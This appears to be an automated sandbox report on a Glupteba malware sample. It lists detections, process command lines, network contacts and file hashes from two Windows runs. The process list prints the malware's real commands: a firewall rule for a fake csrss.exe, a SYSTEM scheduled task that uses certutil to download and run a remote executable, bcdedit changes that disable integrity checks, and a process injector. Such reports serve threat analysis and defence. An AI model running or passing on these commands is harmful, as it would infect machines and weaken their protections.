Analysis Overview
SHA256
fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7
Threat Level: Known bad
The file 6da0370835d68a8974fcb588fecb3fbf was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Glupteba
MetaSploit
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Program crash
GoLang User-Agent
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-21 17:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-21 17:38
Reported
2024-01-21 17:41
Platform
win7-20231129-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Glupteba
Glupteba payload
MetaSploit
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240121173852.log C:\Windows\Logs\CBS\CbsPersist_20240121173852.cab
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /197-197
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-21 17:38
Reported
2024-01-21 17:41
Platform
win10v2004-20231222-en
Max time kernel
1s
Max time network
146s
Command Line
Signatures
Glupteba
Glupteba payload
MetaSploit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /197-197
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5352 -ip 5352
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1484
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5352 -ip 5352
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.113.22.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 37.48.65.151:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.65.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.225:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70c7f849-f917-48e2-957d-4b64ce8aeb84.ninhaine.com | udp |
| US | 8.8.8.8:53 | server11.ninhaine.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
memory/4592-1-0x0000000002B50000-0x0000000002F8E000-memory.dmp
memory/4592-2-0x0000000002F90000-0x00000000038B7000-memory.dmp
memory/4592-3-0x0000000000400000-0x000000000258E000-memory.dmp
memory/4592-5-0x0000000000400000-0x000000000258E000-memory.dmp
memory/4592-6-0x0000000002F90000-0x00000000038B7000-memory.dmp
memory/4568-7-0x00000000028D0000-0x0000000002D0E000-memory.dmp
memory/4568-8-0x0000000002D10000-0x0000000003637000-memory.dmp
memory/4568-9-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 09af2a562bf25f83f51bf3699b16d5b6 |
| SHA1 | c187ffcf40d7998b46a3a9f14e1f638f8d49c5e4 |
| SHA256 | e4f27364add69769e2c783282969cb5a402357685ff2f0c935e15482b93def1b |
| SHA512 | 9e960c1c8c68cb9a36e7d544676b973c359d6373496af89d7d46a875ae0f9205de83cc8d82fd62af444f96696338ff13a36549a3cc70167dea3cb7fd7fc1e235 |
C:\Windows\rss\csrss.exe
| MD5 | a1fcc944237ba57f897d2c95bee0e044 |
| SHA1 | 0bb5a4ef2ccc2bb9d41cbf7082e3cbc49b7f5e27 |
| SHA256 | 3402853ea7ad2c249deac219cd7f3e535c36d5158adbfc3e4dfe1e610a36b63e |
| SHA512 | 1ea0b4a0b7a0c7153bdf4725c911f7af7f20475864f3e0095bb971ca009d9e4b2de1b1c51a04a0dd482acc337907b437073e33c12792ce2b72a65e62f78087fa |
memory/4568-17-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-21-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-20-0x0000000002E00000-0x0000000003300000-memory.dmp
memory/5352-22-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 5972f8a92166f37c67a3d70921794c96 |
| SHA1 | 0974e74b29054f7edc6f2275804a44623a575bda |
| SHA256 | e315541f6881f5032fefe499e1d82d7d36a6f51be91ee0f2422894aaa3644aaa |
| SHA512 | f76cf38b5f6911d6da78d8fbd5b8c7cd53f6292c4f2e9094e6c5c0950a2cc755fb24e5c7d82b01b47c4ed7039832dfab23b2b89d6fc67e8babee4f197cc01498 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 1868d1207d734ac95ef900476b1d1fc2 |
| SHA1 | 58dc6fd96a51edd9894302048989a40f239159c2 |
| SHA256 | 7d75b5eb33370ba631f86ab8d9582866df942897066b2a12f10ae8b0202f48af |
| SHA512 | ce2a0b5d43539278aebde9e7389db357e4bcaf864227f46abc8565361c17ccfbac0a9c0ef058b71f35cb0331b910a70f40de9c9f05232fd8f7d5044ffefc470c |
memory/5352-29-0x0000000002E00000-0x0000000003300000-memory.dmp
memory/5352-28-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-30-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-31-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-32-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-33-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-34-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-35-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-36-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-37-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-38-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-39-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-40-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-41-0x0000000000400000-0x000000000258E000-memory.dmp